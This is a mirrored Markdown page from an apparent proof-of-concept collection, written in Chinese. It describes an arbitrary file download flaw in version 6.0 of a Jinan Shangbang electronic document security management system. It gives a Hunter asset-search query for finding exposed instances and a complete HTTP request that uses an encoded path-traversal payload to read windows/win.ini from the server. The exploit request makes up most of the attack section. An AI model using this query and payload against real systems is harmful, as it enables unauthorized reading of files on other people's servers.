mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-08 11:57:27 +00:00
37 lines
1.3 KiB
Markdown
37 lines
1.3 KiB
Markdown
# 电子文档安全管理系统 V6.0存在任意文件下载
|
|
|
|
# 一、漏洞简介
|
|
济南上邦电子科技有限公司电子文档安全管理系统 V6.0存在任意文件下载
|
|
|
|
# 二、影响版本
|
|
+ 济南上邦电子科技有限公司电子文档安全管理系统 V6.0
|
|
|
|
# 三、资产测绘
|
|
+ hunter`web.body="docsafe/docsafe.nocache.js"`
|
|
+ 特征
|
|
|
|

|
|
|
|
# 四、漏洞复现
|
|
```plain
|
|
GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1
|
|
Host: xx.xx.xx.xx
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|
Accept-Encoding: gzip, deflate
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: none
|
|
Sec-Fetch-User: ?1
|
|
Te: trailers
|
|
Connection: close
|
|
```
|
|
|
|

|
|
|
|
|
|
|
|
> 更新: 2024-02-29 23:55:47
|
|
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/up1n14t1s2wcmfqp> |